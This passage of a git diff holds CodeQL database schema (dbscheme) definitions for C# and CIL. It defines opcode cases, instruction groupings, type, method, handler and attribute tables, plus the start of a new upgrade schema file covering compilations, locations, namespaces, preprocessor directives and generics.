@cil_conv_ovf_i1 +| 180 = @cil_conv_ovf_u1 +| 181 = @cil_conv_ovf_i2 +| 182 = @cil_conv_ovf_u2 +| 183 = @cil_conv_ovf_i4 +| 184 = @cil_conv_ovf_u4 +| 185 = @cil_conv_ovf_i8 +| 186 = @cil_conv_ovf_u8 +| 194 = @cil_refanyval +| 195 = @cil_ckinfinite +| 198 = @cil_mkrefany +| 208 = @cil_ldtoken +| 209 = @cil_conv_u2 +| 210 = @cil_conv_u1 +| 211 = @cil_conv_i +| 212 = @cil_conv_ovf_i +| 213 = @cil_conv_ovf_u +| 214 = @cil_add_ovf +| 215 = @cil_add_ovf_un +| 216 = @cil_mul_ovf +| 217 = @cil_mul_ovf_un +| 218 = @cil_sub_ovf +| 219 = @cil_sub_ovf_un +| 220 = @cil_endfinally +| 221 = @cil_leave +| 222 = @cil_leave_s +| 223 = @cil_stind_i +| 224 = @cil_conv_u +| 65024 = @cil_arglist +| 65025 = @cil_ceq +| 65026 = @cil_cgt +| 65027 = @cil_cgt_un +| 65028 = @cil_clt +| 65029 = @cil_clt_un +| 65030 = @cil_ldftn +| 65031 = @cil_ldvirtftn +| 65033 = @cil_ldarg +| 65034 = @cil_ldarga +| 65035 = @cil_starg +| 65036 = @cil_ldloc +| 65037 = @cil_ldloca +| 65038 = @cil_stloc +| 65039 = @cil_localloc +| 65041 = @cil_endfilter +| 65042 = @cil_unaligned +| 65043 = @cil_volatile +| 65044 = @cil_tail +| 65045 = @cil_initobj +| 65046 = @cil_constrained +| 65047 = @cil_cpblk +| 65048 = @cil_initblk +| 65050 = @cil_rethrow +| 65052 = @cil_sizeof +| 65053 = @cil_refanytype +| 65054 = @cil_readonly +; + +// CIL ignored instructions + +@cil_ignore = @cil_nop | @cil_break | @cil_volatile | @cil_unaligned; + +// CIL local/parameter/field access + +@cil_ldarg_any = @cil_ldarg_0 | @cil_ldarg_1 | @cil_ldarg_2 | @cil_ldarg_3 | @cil_ldarg_s | @cil_ldarga_s | @cil_ldarg | @cil_ldarga; +@cil_starg_any = @cil_starg | @cil_starg_s; + +@cil_ldloc_any = @cil_ldloc_0 | @cil_ldloc_1 | @cil_ldloc_2 | @cil_ldloc_3 | @cil_ldloc_s | @cil_ldloca_s | @cil_ldloc | @cil_ldloca; +@cil_stloc_any = @cil_stloc_0 | @cil_stloc_1 | @cil_stloc_2 | @cil_stloc_3 | @cil_stloc_s | @cil_stloc; + +@cil_ldfld_any = @cil_ldfld | @cil_ldsfld | @cil_ldsflda | @cil_ldflda; +@cil_stfld_any = @cil_stfld | @cil_stsfld; + +@cil_local_access = @cil_stloc_any | @cil_ldloc_any; +@cil_arg_access = @cil_starg_any | @cil_ldarg_any; +@cil_read_access = @cil_ldloc_any | @cil_ldarg_any | @cil_ldfld_any; +@cil_write_access = @cil_stloc_any | @cil_starg_any | @cil_stfld_any; + +@cil_stack_access = @cil_local_access | @cil_arg_access; +@cil_field_access = @cil_ldfld_any | @cil_stfld_any; + +@cil_access = @cil_read_access | @cil_write_access; + +// CIL constant/literal instructions + +@cil_ldc_i = @cil_ldc_i4_any | @cil_ldc_i8; + +@cil_ldc_i4_any = @cil_ldc_i4_m1 | @cil_ldc_i4_0 | @cil_ldc_i4_1 | @cil_ldc_i4_2 | @cil_ldc_i4_3 | + @cil_ldc_i4_4 | @cil_ldc_i4_5 | @cil_ldc_i4_6 | @cil_ldc_i4_7 | @cil_ldc_i4_8 | @cil_ldc_i4_s | @cil_ldc_i4; + +@cil_ldc_r = @cil_ldc_r4 | @cil_ldc_r8; + +@cil_literal = @cil_ldnull | @cil_ldc_i | @cil_ldc_r | @cil_ldstr; + +// Control flow + +@cil_conditional_jump = @cil_binary_jump | @cil_unary_jump; +@cil_binary_jump = @cil_beq_s | @cil_bge_s | @cil_bgt_s | @cil_ble_s | @cil_blt_s | + @cil_bne_un_s | @cil_bge_un_s | @cil_bgt_un_s | @cil_ble_un_s | @cil_blt_un_s | + @cil_beq | @cil_bge | @cil_bgt | @cil_ble | @cil_blt | + @cil_bne_un | @cil_bge_un | @cil_bgt_un | @cil_ble_un | @cil_blt_un; +@cil_unary_jump = @cil_brfalse_s | @cil_brtrue_s | @cil_brfalse | @cil_brtrue | @cil_switch; +@cil_unconditional_jump = @cil_br | @cil_br_s | @cil_leave_any; +@cil_leave_any = @cil_leave | @cil_leave_s; +@cil_jump = @cil_unconditional_jump | @cil_conditional_jump; + +// CIL call instructions + +@cil_call_any = @cil_jmp | @cil_call | @cil_calli | @cil_tail | @cil_callvirt | @cil_newobj; + +// CIL expression instructions + +@cil_expr = @cil_literal | @cil_binary_expr | @cil_unary_expr | @cil_call_any | @cil_read_access | + @cil_newarr | @cil_ldtoken | @cil_sizeof | + @cil_ldftn | @cil_ldvirtftn | @cil_localloc | @cil_mkrefany | @cil_refanytype | @cil_arglist | @cil_dup; + +@cil_unary_expr = + @cil_conversion_operation | @cil_unary_arithmetic_operation | @cil_unary_bitwise_operation| + @cil_ldlen | @cil_isinst | @cil_box | @cil_ldobj | @cil_castclass | @cil_unbox_any | + @cil_ldind | @cil_unbox; + +@cil_conversion_operation = + @cil_conv_i1 | @cil_conv_i2 | @cil_conv_i4 | @cil_conv_i8 | + @cil_conv_u1 | @cil_conv_u2 | @cil_conv_u4 | @cil_conv_u8 | + @cil_conv_ovf_i | @cil_conv_ovf_i_un | @cil_conv_ovf_i1 | @cil_conv_ovf_i1_un | + @cil_conv_ovf_i2 | @cil_conv_ovf_i2_un | @cil_conv_ovf_i4 | @cil_conv_ovf_i4_un | + @cil_conv_ovf_i8 | @cil_conv_ovf_i8_un | @cil_conv_ovf_u | @cil_conv_ovf_u_un | + @cil_conv_ovf_u1 | @cil_conv_ovf_u1_un | @cil_conv_ovf_u2 | @cil_conv_ovf_u2_un | + @cil_conv_ovf_u4 | @cil_conv_ovf_u4_un | @cil_conv_ovf_u8 | @cil_conv_ovf_u8_un | + @cil_conv_r4 | @cil_conv_r8 | @cil_conv_ovf_u2 | @cil_conv_ovf_u2_un | + @cil_conv_i | @cil_conv_u | @cil_conv_r_un; + +@cil_ldind = @cil_ldind_i | @cil_ldind_i1 | @cil_ldind_i2 | @cil_ldind_i4 | @cil_ldind_i8 | + @cil_ldind_r4 | @cil_ldind_r8 | @cil_ldind_ref | @cil_ldind_u1 | @cil_ldind_u2 | @cil_ldind_u4; + +@cil_stind = @cil_stind_i | @cil_stind_i1 | @cil_stind_i2 | @cil_stind_i4 | @cil_stind_i8 | + @cil_stind_r4 | @cil_stind_r8 | @cil_stind_ref; + +@cil_bitwise_operation = @cil_binary_bitwise_operation | @cil_unary_bitwise_operation; + +@cil_binary_bitwise_operation = @cil_and | @cil_or | @cil_xor | @cil_shr | @cil_shr | @cil_shr_un | @cil_shl; + +@cil_binary_arithmetic_operation = @cil_add | @cil_sub | @cil_mul | @cil_div | @cil_div_un | + @cil_rem | @cil_rem_un | @cil_add_ovf | @cil_add_ovf_un | @cil_mul_ovf | @cil_mul_ovf_un | + @cil_sub_ovf | @cil_sub_ovf_un; + +@cil_unary_bitwise_operation = @cil_not; + +@cil_binary_expr = @cil_binary_arithmetic_operation | @cil_binary_bitwise_operation | @cil_read_array | @cil_comparison_operation; + +@cil_unary_arithmetic_operation = @cil_neg; + +@cil_comparison_operation = @cil_cgt_un | @cil_ceq | @cil_cgt | @cil_clt | @cil_clt_un; + +// Elements that retrieve an address of something +@cil_read_ref = @cil_ldloca_s | @cil_ldarga_s | @cil_ldflda | @cil_ldsflda | @cil_ldelema; + +// CIL array instructions + +@cil_read_array = + @cil_ldelem | @cil_ldelema | @cil_ldelem_i1 | @cil_ldelem_ref | @cil_ldelem_i | + @cil_ldelem_i1 | @cil_ldelem_i2 | @cil_ldelem_i4 | @cil_ldelem_i8 | @cil_ldelem_r4 | + @cil_ldelem_r8 | @cil_ldelem_u1 | @cil_ldelem_u2 | @cil_ldelem_u4; + +@cil_write_array = @cil_stelem | @cil_stelem_ref | + @cil_stelem_i | @cil_stelem_i1 | @cil_stelem_i2 | @cil_stelem_i4 | @cil_stelem_i8 | + @cil_stelem_r4 | @cil_stelem_r8; + +@cil_throw_any = @cil_throw | @cil_rethrow; + +#keyset[impl, index] +cil_instruction( + unique int id: @cil_instruction, + int opcode: int ref, + int index: int ref, + int impl: @cil_method_implementation ref); + +cil_jump( + unique int instruction: @cil_jump ref, + int target: @cil_instruction ref); + +cil_access( + unique int instruction: @cil_instruction ref, + int target: @cil_accessible ref); + +cil_value( + unique int instruction: @cil_literal ref, + string value: string ref); + +#keyset[instruction, index] +cil_switch( + int instruction: @cil_switch ref, + int index: int ref, + int target: @cil_instruction ref); + +cil_instruction_location( + unique int id: @cil_instruction ref, + int loc: @location ref); + +cil_type_location( + int id: @cil_type ref, + int loc: @location ref); + +cil_method_location( + int id: @cil_method ref, + int loc: @location ref); + +@cil_namespace = @namespace; + +@cil_type_container = @cil_type | @cil_namespace | @cil_method; + +case @cil_type.kind of + 0 = @cil_valueorreftype +| 1 = @cil_typeparameter +| 2 = @cil_array_type +| 3 = @cil_pointer_type +| 4 = @cil_function_pointer_type +; + +cil_type( + unique int id: @cil_type, + string name: string ref, + int kind: int ref, + int parent: @cil_type_container ref, + int sourceDecl: @cil_type ref); + +cil_pointer_type( + unique int id: @cil_pointer_type ref, + int pointee: @cil_type ref); + +cil_array_type( + unique int id: @cil_array_type ref, + int element_type: @cil_type ref, + int rank: int ref); + +cil_function_pointer_return_type( + unique int id: @cil_function_pointer_type ref, + int return_type: @cil_type ref); + +cil_method( + unique int id: @cil_method, + string name: string ref, + int parent: @cil_type ref, + int return_type: @cil_type ref); + +cil_method_source_declaration( + unique int method: @cil_method ref, + int source: @cil_method ref); + +cil_method_implementation( + unique int id: @cil_method_implementation, + int method: @cil_method ref, + int location: @assembly ref); + +cil_implements( + int id: @cil_method ref, + int decl: @cil_method ref); + +#keyset[parent, name] +cil_field( + unique int id: @cil_field, + int parent: @cil_type ref, + string name: string ref, + int field_type: @cil_type ref); + +@cil_element = @cil_instruction | @cil_declaration | @cil_handler | @cil_attribute | @cil_namespace; +@cil_named_element = @cil_declaration | @cil_namespace; +@cil_declaration = @cil_variable | @cil_method | @cil_type | @cil_member; +@cil_accessible = @cil_declaration; +@cil_variable = @cil_field | @cil_stack_variable; +@cil_stack_variable = @cil_local_variable | @cil_parameter; +@cil_member = @cil_method | @cil_type | @cil_field | @cil_property | @cil_event; +@cil_custom_modifier_receiver = @cil_method | @cil_property | @cil_parameter | @cil_field | @cil_function_pointer_type; +@cil_parameterizable = @cil_method | @cil_function_pointer_type; +@cil_has_type_annotation = @cil_stack_variable | @cil_property | @cil_method | @cil_function_pointer_type; + +#keyset[parameterizable, index] +cil_parameter( + unique int id: @cil_parameter, + int parameterizable: @cil_parameterizable ref, + int index: int ref, + int param_type: @cil_type ref); + +cil_parameter_in(unique int id: @cil_parameter ref); +cil_parameter_out(unique int id: @cil_parameter ref); + +cil_setter(unique int prop: @cil_property ref, + int method: @cil_method ref); + +#keyset[id, modifier] +cil_custom_modifiers( + int id: @cil_custom_modifier_receiver ref, + int modifier: @cil_type ref, + int kind: int ref); // modreq: 1, modopt: 0 + +cil_type_annotation( + int id: @cil_has_type_annotation ref, + int annotation: int ref); + +cil_getter(unique int prop: @cil_property ref, + int method: @cil_method ref); + +cil_adder(unique int event: @cil_event ref, + int method: @cil_method ref); + +cil_remover(unique int event: @cil_event ref, int method: @cil_method ref); + +cil_raiser(unique int event: @cil_event ref, int method: @cil_method ref); + +cil_property( + unique int id: @cil_property, + int parent: @cil_type ref, + string name: string ref, + int property_type: @cil_type ref); + +#keyset[parent, name] +cil_event(unique int id: @cil_event, + int parent: @cil_type ref, + string name: string ref, + int event_type: @cil_type ref); + +#keyset[impl, index] +cil_local_variable( + unique int id: @cil_local_variable, + int impl: @cil_method_implementation ref, + int index: int ref, + int var_type: @cil_type ref); + +cil_function_pointer_calling_conventions( + int id: @cil_function_pointer_type ref, + int kind: int ref); + +// CIL handlers (exception handlers etc). + +case @cil_handler.kind of + 0 = @cil_catch_handler +| 1 = @cil_filter_handler +| 2 = @cil_finally_handler +| 4 = @cil_fault_handler +; + +#keyset[impl, index] +cil_handler( + unique int id: @cil_handler, + int impl: @cil_method_implementation ref, + int index: int ref, + int kind: int ref, + int try_start: @cil_instruction ref, + int try_end: @cil_instruction ref, + int handler_start: @cil_instruction ref); + +cil_handler_filter( + unique int id: @cil_handler ref, + int filter_start: @cil_instruction ref); + +cil_handler_type( + unique int id: @cil_handler ref, + int catch_type: @cil_type ref); + +@cil_controlflow_node = @cil_entry_point | @cil_instruction; + +@cil_entry_point = @cil_method_implementation | @cil_handler; + +@cil_dataflow_node = @cil_instruction | @cil_variable | @cil_method; + +cil_method_stack_size( + unique int method: @cil_method_implementation ref, + int size: int ref); + +// CIL modifiers + +cil_public(int id: @cil_member ref); +cil_private(int id: @cil_member ref); +cil_protected(int id: @cil_member ref); +cil_internal(int id: @cil_member ref); +cil_static(int id: @cil_member ref); +cil_sealed(int id: @cil_member ref); +cil_virtual(int id: @cil_method ref); +cil_abstract(int id: @cil_member ref); +cil_class(int id: @cil_type ref); +cil_interface(int id: @cil_type ref); +cil_security(int id: @cil_member ref); +cil_requiresecobject(int id: @cil_method ref); +cil_specialname(int id: @cil_method ref); +cil_newslot(int id: @cil_method ref); + +cil_base_class(unique int id: @cil_type ref, int base: @cil_type ref); +cil_base_interface(int id: @cil_type ref, int base: @cil_type ref); +cil_enum_underlying_type(unique int id: @cil_type ref, int underlying: @cil_type ref); + +#keyset[unbound, index] +cil_type_parameter( + int unbound: @cil_member ref, + int index: int ref, + int param: @cil_typeparameter ref); + +#keyset[bound, index] +cil_type_argument( + int bound: @cil_member ref, + int index: int ref, + int t: @cil_type ref); + +// CIL type parameter constraints + +cil_typeparam_covariant(int tp: @cil_typeparameter ref); +cil_typeparam_contravariant(int tp: @cil_typeparameter ref); +cil_typeparam_class(int tp: @cil_typeparameter ref); +cil_typeparam_struct(int tp: @cil_typeparameter ref); +cil_typeparam_new(int tp: @cil_typeparameter ref); +cil_typeparam_constraint(int tp: @cil_typeparameter ref, int supertype: @cil_type ref); + +// CIL attributes + +cil_attribute( + unique int attributeid: @cil_attribute, + int element: @cil_declaration ref, + int constructor: @cil_method ref); + +#keyset[attribute_id, param] +cil_attribute_named_argument( + int attribute_id: @cil_attribute ref, + string param: string ref, + string value: string ref); + +#keyset[attribute_id, index] +cil_attribute_positional_argument( + int attribute_id: @cil_attribute ref, + int index: int ref, + string value: string ref); + + +// Common .Net data model covering both C# and CIL + +// Common elements +@dotnet_element = @element | @cil_element; +@dotnet_named_element = @named_element | @cil_named_element; +@dotnet_callable = @callable | @cil_method; +@dotnet_variable = @variable | @cil_variable; +@dotnet_field = @field | @cil_field; +@dotnet_parameter = @parameter | @cil_parameter; +@dotnet_declaration = @declaration | @cil_declaration; +@dotnet_member = @member | @cil_member; +@dotnet_event = @event | @cil_event; +@dotnet_property = @property | @cil_property | @indexer; +@dotnet_parameterizable = @parameterizable | @cil_parameterizable; + +// Common types +@dotnet_type = @type | @cil_type; +@dotnet_call = @call | @cil_call_any; +@dotnet_throw = @throw_element | @cil_throw_any; +@dotnet_valueorreftype = @cil_valueorreftype | @value_or_ref_type | @cil_array_type | @void_type; +@dotnet_typeparameter = @type_parameter | @cil_typeparameter; +@dotnet_array_type = @array_type | @cil_array_type; +@dotnet_pointer_type = @pointer_type | @cil_pointer_type; +@dotnet_type_parameter = @type_parameter | @cil_typeparameter; +@dotnet_generic = @dotnet_valueorreftype | @dotnet_callable; + +// Attributes +@dotnet_attribute = @attribute | @cil_attribute; + +// Expressions +@dotnet_expr = @expr | @cil_expr; + +// Literals +@dotnet_literal = @literal_expr | @cil_literal; +@dotnet_string_literal = @string_literal_expr | @cil_ldstr; +@dotnet_int_literal = @integer_literal_expr | @cil_ldc_i; +@dotnet_float_literal = @float_literal_expr | @cil_ldc_r; +@dotnet_null_literal = @null_literal_expr | @cil_ldnull; + +@metadata_entity = @cil_method | @cil_type | @cil_field | @cil_property | @field | @property | + @callable | @value_or_ref_type | @void_type; + +#keyset[entity, location] +metadata_handle(int entity : @metadata_entity ref, int location: @assembly ref, int handle: int ref) diff --git a/csharp/ql/lib/upgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/semmlecode.csharp.dbscheme b/csharp/ql/lib/upgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/semmlecode.csharp.dbscheme new file mode 100644 index 00000000000..1136957c0b3 --- /dev/null +++ b/csharp/ql/lib/upgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/semmlecode.csharp.dbscheme @@ -0,0 +1,2069 @@ +/* This is a dummy line to alter the dbscheme, so we can make a database upgrade + * without actually changing any of the dbscheme predicates. It contains a date + * to allow for such updates in the future as well. + * + * 2021-07-14 + * + * DO NOT remove this comment carelessly, since it can revert the dbscheme back to a + * previously seen state (matching a previously seen SHA), which would make the upgrade + * mechanism not work properly. + */ + +/** + * An invocation of the compiler. Note that more than one file may be + * compiled per invocation. For example, this command compiles three + * source files: + * + * csc f1.cs f2.cs f3.cs + * + * The `id` simply identifies the invocation, while `cwd` is the working + * directory from which the compiler was invoked. + */ +compilations( + unique int id : @compilation, + string cwd : string ref +); + +/** + * The arguments that were passed to the extractor for a compiler + * invocation. If `id` is for the compiler invocation + * + * csc f1.cs f2.cs f3.cs + * + * then typically there will be rows for + * + * num | arg + * --- | --- + * 0 | --compiler + * 1 | *path to compiler* + * 2 | f1.cs + * 3 | f2.cs + * 4 | f3.cs + */ +#keyset[id, num] +compilation_args( + int id : @compilation ref, + int num : int ref, + string arg : string ref +); + +/** + * The source files that are compiled by a compiler invocation. + * If `id` is for the compiler invocation + * + * csc f1.cs f2.cs f3.cs + * + * then there will be rows for + * + * num | arg + * --- | --- + * 0 | f1.cs + * 1 | f2.cs + * 2 | f3.cs + */ +#keyset[id, num] +compilation_compiling_files( + int id : @compilation ref, + int num : int ref, + int file : @file ref +); + +/** + * The references used by a compiler invocation. + * If `id` is for the compiler invocation + * + * csc f1.cs f2.cs f3.cs /r:ref1.dll /r:ref2.dll /r:ref3.dll + * + * then there will be rows for + * + * num | arg + * --- | --- + * 0 | ref1.dll + * 1 | ref2.dll + * 2 | ref3.dll + */ +#keyset[id, num] +compilation_referencing_files( + int id : @compilation ref, + int num : int ref, + int file : @file ref +); + +/** + * The time taken by the extractor for a compiler invocation. + * + * For each file `num`, there will be rows for + * + * kind | seconds + * ---- | --- + * 1 | CPU seconds used by the extractor frontend + * 2 | Elapsed seconds during the extractor frontend + * 3 | CPU seconds used by the extractor backend + * 4 | Elapsed seconds during the extractor backend + */ +#keyset[id, num, kind] +compilation_time( + int id : @compilation ref, + int num : int ref, + /* kind: + 1 = frontend_cpu_seconds + 2 = frontend_elapsed_seconds + 3 = extractor_cpu_seconds + 4 = extractor_elapsed_seconds + */ + int kind : int ref, + float seconds : float ref +); + +/** + * An error or warning generated by the extractor. + * The diagnostic message `diagnostic` was generated during compiler + * invocation `compilation`, and is the `file_number_diagnostic_number`th + * message generated while extracting the `file_number`th file of that + * invocation. + */ +#keyset[compilation, file_number, file_number_diagnostic_number] +diagnostic_for( + unique int diagnostic : @diagnostic ref, + int compilation : @compilation ref, + int file_number : int ref, + int file_number_diagnostic_number : int ref +); + +diagnostics( + unique int id: @diagnostic, + int severity: int ref, + string error_tag: string ref, + string error_message: string ref, + string full_error_message: string ref, + int location: @location_default ref +); + +extractor_messages( + unique int id: @extractor_message, + int severity: int ref, + string origin : string ref, + string text : string ref, + string entity : string ref, + int location: @location_default ref, + string stack_trace : string ref +); + +/** + * If extraction was successful, then `cpu_seconds` and + * `elapsed_seconds` are the CPU time and elapsed time (respectively) + * that extraction took for compiler invocation `id`. + */ +compilation_finished( + unique int id : @compilation ref, + float cpu_seconds : float ref, + float elapsed_seconds : float ref +); + +compilation_assembly( + unique int id : @compilation ref, + int assembly: @assembly ref +) + +// Populated by the CSV extractor +externalData( + int id: @externalDataElement, + string path: string ref, + int column: int ref, + string value: string ref); + +sourceLocationPrefix( + string prefix: string ref); + +/* + * C# dbscheme + */ + +/** ELEMENTS **/ + +@element = @declaration | @stmt | @expr | @modifier | @attribute | @namespace_declaration + | @using_directive | @type_parameter_constraints | @externalDataElement + | @xmllocatable | @asp_element | @namespace | @preprocessor_directive; + +@declaration = @callable | @generic | @assignable | @namespace; + +@named_element = @namespace | @declaration; + +@declaration_with_accessors = @property | @indexer | @event; + +@assignable = @variable | @assignable_with_accessors | @event; + +@assignable_with_accessors = @property | @indexer; + +@attributable = @assembly | @field | @parameter | @operator | @method | @constructor + | @destructor | @callable_accessor | @value_or_ref_type | @declaration_with_accessors + | @local_function | @lambda_expr; + +/** LOCATIONS, ASEMMBLIES, MODULES, FILES and FOLDERS **/ + +@location = @location_default | @assembly; + +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref); + +locations_mapped( + unique int id: @location_default ref, + int mapped_to: @location_default ref); + +@sourceline = @file | @callable | @xmllocatable; + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref); + +assemblies( + unique int id: @assembly, + int file: @file ref, + string fullname: string ref, + string name: string ref, + string version: string ref); + +files( + unique int id: @file, + string name: string ref); + +folders( + unique int id: @folder, + string name: string ref); + +@container = @folder | @file ; + +containerparent( + int parent: @container ref, + unique int child: @container ref); + +file_extraction_mode( + unique int file: @file ref, + int mode: int ref + /* 0 = normal, 1 = standalone extractor */ + ); + +/** NAMESPACES **/ + +@type_container = @namespace | @type; + +namespaces( + unique int id: @namespace, + string name: string ref); + +namespace_declarations( + unique int id: @namespace_declaration, + int namespace_id: @namespace ref); + +namespace_declaration_location( + unique int id: @namespace_declaration ref, + int loc: @location ref); + +parent_namespace( + unique int child_id: @type_container ref, + int namespace_id: @namespace ref); + +@declaration_or_directive = @namespace_declaration | @type | @using_directive; + +parent_namespace_declaration( + int child_id: @declaration_or_directive ref, // cannot be unique because of partial classes + int namespace_id: @namespace_declaration ref); + +@using_directive = @using_namespace_directive | @using_static_directive; + +using_global( + unique int id: @using_directive ref +); + +using_namespace_directives( + unique int id: @using_namespace_directive, + int namespace_id: @namespace ref); + +using_static_directives( + unique int id: @using_static_directive, + int type_id: @type_or_ref ref); + +using_directive_location( + unique int id: @using_directive ref, + int loc: @location ref); + +@preprocessor_directive = @pragma_warning | @pragma_checksum | @directive_define | @directive_undefine | @directive_warning + | @directive_error | @directive_nullable | @directive_line | @directive_region | @directive_endregion | @directive_if + | @directive_elif | @directive_else | @directive_endif; + +@conditional_directive = @directive_if | @directive_elif; +@branch_directive = @directive_if | @directive_elif | @directive_else; + +directive_ifs( + unique int id: @directive_if, + int branchTaken: int ref, /* 0: false, 1: true */ + int conditionValue: int ref); /* 0: false, 1: true */ + +directive_elifs( + unique int id: @directive_elif, + int branchTaken: int ref, /* 0: false, 1: true */ + int conditionValue: int ref, /* 0: false, 1: true */ + int parent: @directive_if ref, + int index: int ref); + +directive_elses( + unique int id: @directive_else, + int branchTaken: int ref, /* 0: false, 1: true */ + int parent: @directive_if ref, + int index: int ref); + +#keyset[id, start] +directive_endifs( + unique int id: @directive_endif, + unique int start: @directive_if ref); + +directive_define_symbols( + unique int id: @define_symbol_expr ref, + string name: string ref); + +directive_regions( + unique int id: @directive_region, + string name: string ref); + +#keyset[id, start] +directive_endregions( + unique int id: @directive_endregion, + unique int start: @directive_region ref); + +directive_lines( + unique int id: @directive_line, + int kind: int ref); /* 0: default, 1: hidden, 2: numeric, 3: span */ + +directive_line_value( + unique int id: @directive_line ref, + int line: int ref); + +directive_line_file( + unique int id: @directive_line ref, + int file: @file ref); + +directive_line_offset( + unique int id: @directive_line ref, + int offset: int ref); + +directive_line_span( + unique int id: @directive_line ref, + int startLine: int ref, + int startColumn: int ref, + int endLine: int ref, + int endColumn: int ref); + +directive_nullables( + unique int id: @directive_nullable, + int setting: int ref, /* 0: disable, 1: enable, 2: restore */ + int target: int ref); /* 0: none, 1: annotations, 2: warnings */ + +directive_warnings( + unique int id: @directive_warning, + string message: string ref); + +directive_errors( + unique int id: @directive_error, + string message: string ref); + +directive_undefines( + unique int id: @directive_undefine, + string name: string ref); + +directive_defines( + unique int id: @directive_define, + string name: string ref); + +pragma_checksums( + unique int id: @pragma_checksum, + int file: @file ref, + string guid: string ref, + string bytes: string ref); + +pragma_warnings( + unique int id: @pragma_warning, + int kind: int ref /* 0 = disable, 1 = restore */); + +#keyset[id, index] +pragma_warning_error_codes( + int id: @pragma_warning ref, + string errorCode: string ref, + int index: int ref); + +preprocessor_directive_location( + unique int id: @preprocessor_directive ref, + int loc: @location ref); + +preprocessor_directive_compilation( + unique int id: @preprocessor_directive ref, + int compilation: @compilation ref); + +preprocessor_directive_active( + unique int id: @preprocessor_directive ref, + int active: int ref); /* 0: false, 1: true */ + +/** TYPES **/ + +types( + unique int id: @type, + int kind: int ref, + string name: string ref); + +case @type.kind of + 1 = @bool_type +| 2 = @char_type +| 3 = @decimal_type +| 4 = @sbyte_type +| 5 = @short_type +| 6 = @int_type +| 7 = @long_type +| 8 = @byte_type +| 9 = @ushort_type +| 10 = @uint_type +| 11 = @ulong_type +| 12 = @float_type +| 13 = @double_type +| 14 = @enum_type +| 15 = @struct_type +| 17 = @class_type +| 19 = @interface_type +| 20 = @delegate_type +| 21 = @null_type +| 22 = @type_parameter +| 23 = @pointer_type +| 24 = @nullable_type +| 25 = @array_type +| 26 = @void_type +| 27 = @int_ptr_type +| 28 = @uint_ptr_type +| 29 = @dynamic_type +| 30 = @arglist_type +| 31 = @unknown_type +| 32 = @tuple_type +| 33 = @function_pointer_type + ; + +@simple_type = @bool_type | @char_type | @integral_type | @floating_point_type | @decimal_type; +@integral_type = @signed_integral_type | @unsigned_integral_type; +@signed_integral_type = @sbyte_type | @short_type | @int_type | @long_type; +@unsigned_integral_type = @byte_type | @ushort_type | @uint_type | @ulong_type; +@floating_point_type = @float_type | @double_type; +@value_type = @simple_type | @enum_type | @struct_type | @nullable_type | @int_ptr_type + | @uint_ptr_type | @tuple_type; +@ref_type = @class_type | @interface_type | @array_type | @delegate_type | @null_type + | @dynamic_type; +@value_or_ref_type = @value_type | @ref_type; + +typerefs( + unique int id: @typeref, + string name: string ref); + +typeref_type( + int id: @typeref ref, + unique int typeId: @type ref); + +@type_or_ref = @type | @typeref; + +array_element_type( + unique int array: @array_type ref, + int dimension: int ref, + int rank: int ref, + int element: @type_or_ref ref); + +nullable_underlying_type( + unique int nullable: @nullable_type ref, + int underlying: @type_or_ref ref); + +pointer_referent_type( + unique int pointer: @pointer_type ref, + int referent: @type_or_ref ref); + +enum_underlying_type( + unique int enum_id: @enum_type ref, + int underlying_type_id: @type_or_ref ref); + +delegate_return_type( + unique int delegate_id: @delegate_type ref, + int return_type_id: @type_or_ref ref); + +function_pointer_return_type( + unique int function_pointer_id: @function_pointer_type ref, + int return_type_id: @type_or_ref ref); + +extend( + int sub: @type ref, + int super: @type_or_ref ref); + +anonymous_types( + unique int id: @type ref); + +@interface_or_ref = @interface_type | @typeref; + +implement( + int sub: @type ref, + int super: @type_or_ref ref); + +type_location( + int id: @type ref, + int loc: @location ref); + +tuple_underlying_type( + unique int tuple: @tuple_type ref, + int struct: @type_or_ref ref); + +#keyset[tuple, index] +tuple_element( + int tuple: @tuple_type ref, + int index: int ref, + unique int field: @field ref); + +attributes( + unique int id: @attribute, + int kind: int ref, + int type_id: @type_or_ref ref, + int target: @attributable ref); + +case @attribute.kind of + 0 = @attribute_default +| 1 = @attribute_return +| 2 = @attribute_assembly +| 3 = @attribute_module +; + +attribute_location( + int id: @attribute ref, + int loc: @location ref); + +@type_mention_parent = @element | @type_mention; + +type_mention( + unique int id: @type_mention, + int type_id: @type_or_ref ref, + int parent: @type_mention_parent ref); + +type_mention_location( + unique int id: @type_mention ref, + int loc: @location ref); + +@has_type_annotation = @assignable | @type_parameter | @callable | @expr | @delegate_type | @generic | @function_pointer_type; + +/** + * A direct annotation on an entity, for example `string? x;`. + * + * Annotations: + * 2 = reftype is not annotated "!" + * 3 = reftype is annotated "?" + * 4 = readonly ref type / in parameter + * 5 = ref type parameter, return or local variable + * 6 = out parameter + * + * Note that the annotation depends on the element it annotates. + * @assignable: The annotation is on the type of the assignable, for example the variable type. + * @type_parameter: The annotation is on the reftype constraint + * @callable: The annotation is on the return type + * @array_type: The annotation is on the element type + */ +type_annotation(int id: @has_type_annotation ref, int annotation: int ref); + +nullability(unique int nullability: @nullability, int kind: int ref); + +case @nullability.kind of + 0 = @oblivious +| 1 = @not_annotated +| 2 = @annotated +; + +#keyset[parent, index] +nullability_parent(int nullability: @nullability ref, int index: int ref, int parent: @nullability ref) + +type_nullability(int id: @has_type_annotation ref, int nullability: @nullability ref); + +/** + * The nullable flow state of an expression, as determined by Roslyn. + * 0 = none (default, not populated) + * 1 = not null + * 2 = maybe null + */ +expr_flowstate(unique int id: @expr ref, int state: int ref); + +/** GENERICS **/ + +@generic = @type | @method | @local_function; + +type_parameters( + unique int id: @type_parameter ref, + int index: int ref, + int generic_id: @generic ref, + int variance: int ref /* none = 0, out = 1, in = 2 */); + +#keyset[constructed_id, index] +type_arguments( + int id: @type_or_ref ref, + int index: int ref, + int constructed_id: @generic_or_ref ref); + +@generic_or_ref = @generic | @typeref; + +constructed_generic( + unique int constructed: @generic ref, + int generic: @generic_or_ref ref); + +type_parameter_constraints( + unique int id: @type_parameter_constraints, + int param_id: @type_parameter ref); + +type_parameter_constraints_location( + int id: @type_parameter_constraints ref, + int loc: @location ref); + +general_type_parameter_constraints( + int id: @type_parameter_constraints 